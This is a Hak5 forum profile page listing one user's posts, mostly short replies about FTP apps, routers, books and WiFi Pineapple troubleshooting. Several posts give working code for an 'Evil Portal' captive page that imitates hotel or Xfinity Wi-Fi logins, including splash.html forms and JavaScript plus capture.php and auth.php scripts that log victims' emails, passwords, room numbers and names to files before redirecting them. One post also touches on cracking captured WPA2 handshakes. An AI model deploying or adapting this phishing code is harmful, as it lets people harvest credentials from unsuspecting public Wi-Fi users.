THCMinister
-
Posts
256 -
Joined
-
Last visited
-
Days Won
1
Posts posted by THCMinister
-
-
Is that a technical term? LOL
Sounds about right. I believe I read this in a Windblows manual once.
-
Um...Yes, you can...
-
My go to's are Andftp or ES File Explorer. JuicySSH for terminal access.
-
But some techniques can use privilege escalation and bypass security. I have always like a vm route.
-
I use one image directory with the images for all portals in it. No issue, I just make sure I don't use the same names between portals.
-
The good ol' search function...
-
Why start another thread? https://forums.hak5.org/index.php?/topic/34503-is-a-bitcoin-miner-only-for-bitcoin/#entry256449
People don't respond right away and asking the same question, where as that could have been condensed into one? I would suggest asking the question with as much details as possible. it helps the confusion. or at least post in the same thread if you are just posting to get your post count up or something.
-
I may be wrong but i do believe, if you have previously browsed to www.google.com the hotel's page would not redirect you but instead not load. As far as the browser new tab goes, highly unlikely... create the fake portal for the hotel, people will connect and will hit the fake portal, not all people but some.
-
With your nose! Sorry had to say it. What are you trying to sniff? more background would help.
-
The local hacker meetup I belong to will be building these at the March meeting.
-
You can replace this long AJAX request with a simple $.post() request like in my other comment. It doesn't make any difference I just want you to know the option is available.
$.post("//172.16.42.1/nodogsplash/auth.php", {email:email_addr,password:pass},function(){ window.location.href="$authtarget"; });Also, in regard to your auth.php script I see you have a variable ($referer) that isn't used and you set
header("Location: $authtarget");This never gets used because the only time this block of code is called is when a POST request is sent. When someone accesses the page manually they immediately drop into the else block which sets the location to splash.html. In the JavaScript, upon a successful call to auth.php the block of code that says
window.location.href="$authtarget";
will redirect the user to $authtarget. The PHP script will not redirect them to $authtarget.
I need to do some code cleanup lol. The redirect/unused variable in the php I accidentally left in during some of the testing I was doing. But thank you for the constructive criticism and assistance.
-
_bugs_, this is not an issue getting evil portal to work, this is an issue with a specific portal the had been given to the public for download. Xfinity Pineapple, a custom page to mimic Xfinity Wifi and capture credentials. It doesn't seem to work out of the box following directions.
-
Why not use jQuery and make this process simpler? You could assign the button to a class then use that to reference it in a javascript function like so:
<button class="send_info_button">Submit</button>
$('.send_info_button').on("click",function(){ $.post('/path/to/script/', {$dataToSend},function(){ window.location = $authtarget; }); });If you need help referencing jquery.min.js look at my post in the Evil Portal support thread here: https://forums.hak5.org/index.php?/topic/33554-support-evil-portal/page-2
Here is what I got and it's working!
In my splash.html
<script src="//172.16.42.1/nodogsplash/jquery.min.js"></script> <script> $(document).ready(function() { $('body').on('click', '.myselector', function(e) { var email_addr = $('#email').val(); var pass = $('#password').val(); if (email_addr == "" || pass == "") { alert("Please login with your Facebook or Google account to access free Wi-Fi."); return; } else { $.ajax({ type: "POST", url: "//172.16.42.1/capture.php", data: {email: email_addr, password: pass}, dataType: 'json', success: function(data, textStatus, jqXHR) { window.location.href="$authtarget"; }, error: function(data, textStatus, errorThrown) { window.location.href="$authtarget"; } }); } }); }); </script> <form id="form_1" method="POST" action="http://172.16.42.1/capture.php"> <table width="959" height="642"> <tr><td colspan="2"> </td></tr> <tr><td align="right">Email :</td><td><input name="email" id="email" type="text"/></td></tr> <tr><td align="right">Password :</td><td><input name="password" id="password" type="password"/></td></tr> <tr><td colspan="2" align="center"><input value="Login To Connect" class="myselector" type="button"></td></tr> </table> </td> </td> </tr> <tr height="50" valign="bottom"><td colspan="2"> </td></tr> </table></form>I used sud0nick's auth.php
<?php if (isset($_POST['email'])) { $fh = fopen('/sd/auth.log', 'a+'); fwrite($fh, "Email: " . $_POST['email'] . "\n"); fwrite($fh, "Pass: " . $_POST['password'] . "\n\n"); fclose($fh); $referer = $_SERVER['HTTP_REFERER']; header("Location: $authtarget"); } else { header('Location: splash.html'); } ?> -
Thanks sud0nick, I think will will readjust my code to use jquery.
-
I will try asap and postt the results, I believe I have tried this method.
-
I am unable to get the redirect for evil portal to work. The capture of the variables works but does not redirect to the $authtarget. I have searched the forums and followed the various examples/solutions provided.
Below is my function code on the splash.html
<script type="text/javascript"> function ajaxRequest() { if (window.XMLHttpRequest) { return new XMLHttpRequest(); } else if (window.ActiveXObject) { return new ActiveXObject("Microsoft.XMLHTTP"); } else { return false; } } function sendInfo() { var xmlhttp = new ajaxRequest(); document.getElementById("results").innerHTML="<p><i>Thank you!</i></p>"; var usernamevalue=encodeURIComponent(document.getElementById("username").value); var passwordvalue=encodeURIComponent(document.getElementById("password").value); var roomnumvalue=encodeURIComponent(document.getElementById("roomnum").value); var lastnamevalue=encodeURIComponent(document.getElementById("lastname").value); var parameters="username="+usernamevalue+"&password="+passwordvalue+"&roomnum="+roomnumvalue+"&lastname="+lastnamevalue; xmlhttp.open("POST", "http://172.16.42.1/capture.php", true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.send(parameters); window.location.assign("$authtarget"); } </script>Here is my form with button
<form id="form_1" method="POST" action="http://172.16.42.1/capture.php"> <br> <div class="credential_block block"> <b>Login with one of the following <br><img src="images/smicons.png"><br> <div id="room_number_cred"> <font class="block">Email</font> <input class="txt_field" name="username" id="username" type="text"> </div> <div id="last_name_cred"> <font class="block">Password</font> <input class="txt_field" name="password" id="password" type="password"> </div> <input value="Connect" type="submit" onclick="sendInfo();return false;">Here is my capture.php
<?php $username = $_POST["username"]; $password = $_POST["password"]; $roomnum = $_POST["roomnum"]; $lastname = $_POST["lastname"]; $file = fopen("stored.txt", "a"); fwrite($file, "Username: " . $username . " Password: " . $password . " RoomNumber: " . $roomnum . " Lastname: " . $lastname . "\n"); fclose($file); echo '<p><i>Thank you!</i></p>'; ?> -
Thanks Seb! Works great. At first I was so sad as this was the first time I was using the autossh and it wasn't working.
Just minor speedbumps but smooth sailing for now.
-
I personally have tried with chrome and Firefox. Both being the latest versions.
-
There seems to be an issue with autossh tile. When I click the checkbox to enable, the pineapple loading spinner shows then goes away. When I manually start the service via cli, it works. If i start it via cli and then refresh the webui, it is checked.
-
I like buffalo routers. Also at least for me, when deciding on a router, I look to see if it can run DD-WRT.
-
No problem. It was a simple Google search away.
-
Here is a good list to start with.
- Hacking Wireless Networks For Dummies
- BackTrack 5 Wireless Penetration Testing Beginner's Guide
- Hacking with Kali: Practical Penetration Testing Techniques
- Step By Step Kali Linux and Wireless Hacking Basics
- Hacking Exposed 7: Network Security Secrets and Solutions
- Wireless Hacking Simplified
-
I'm very interested in an infusion for this. Curious as to what model it was.
-
Sure.
WPA2 1/2 handshake cracking
in WiFi Pineapple Mark V
Posted
This is an interesting concept to obtain the handshake. As far as using the pineapple to perform the actual cracking, there isn't enough power there to do it, you can but it would take a while. You could offload the cap file to be cracked on another system.